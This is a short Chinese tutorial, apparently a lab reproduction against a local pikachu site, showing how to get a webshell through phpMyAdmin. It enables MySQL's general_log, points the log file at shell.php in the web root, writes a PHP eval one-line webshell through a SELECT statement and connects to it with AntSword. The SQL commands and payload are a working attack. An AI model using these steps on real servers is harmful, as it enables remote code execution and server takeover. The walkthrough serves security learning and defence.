PhPMyadmin-漏洞复现

前情条件是:首先将我们的PHP版本设置在5.5以上 注:禁止用于未授权的测试!

首先搭建环境,登录后台

点击》》SQL

查看当前的日志状态

复制代码
  SHOW VARIABLES LIKE 'general%';

因为之前我原来做过所以general_log 是开启的,如果vlau 是OFF时,可以使用

set global general_log = "ON";打开日志

然后后面打开genera_log_file 写到网站目录下

复制代码
  set global general_log_file='D:\\phpstudy_pro\\WWW\\pikachu-master\\shell.php'
前提是知道网站目录下

查看日志,​​看更改日志文件路径是否成功

日志文件里写入一句话木马

复制代码
  select '<?php @eval($_POST[cmd]);?>';

访问一下shell.php

复制代码
  http://pikachu-master/shell.php

能够成功访问

然后适用蚁剑连接

成功连接

相关推荐
这个人需要休息1 小时前
xss的漏洞类型+dvwa DOM xss各难度的小总结
网络·安全
O***p6041 小时前
区块链在智能合约安全中的审计
安全·区块链·智能合约
世界尽头与你1 小时前
CVE-2014-3566: OpenSSL 加密问题漏洞
网络·安全·网络安全·渗透测试
ZeroNews内网穿透1 小时前
ZeroNews IP 访问控制能力
服务器·网络·网络协议·tcp/ip·安全·web安全·小程序
YJlio2 小时前
[鸿蒙2025领航者闯关] 基于鸿蒙 6 的「隐私感知跨设备办公助手」实战:星盾安全 + AI防窥 + 方舟引擎优化全流程复盘
人工智能·安全·harmonyos
vortex52 小时前
网站压缩包上传解压功能的漏洞剖析
网络·安全·web安全
儒道易行2 小时前
【钓鱼攻防】浅谈exe文件伪造ico图标上线CS远控
网络·安全·web安全
人机与认知实验室4 小时前
香港火灾与人机环境系统安全
安全·系统安全
麦聪聊数据7 小时前
IT 的“控”与业务的“放”:构建基于 Web 原生架构的安全数据共享平台
数据库·sql·安全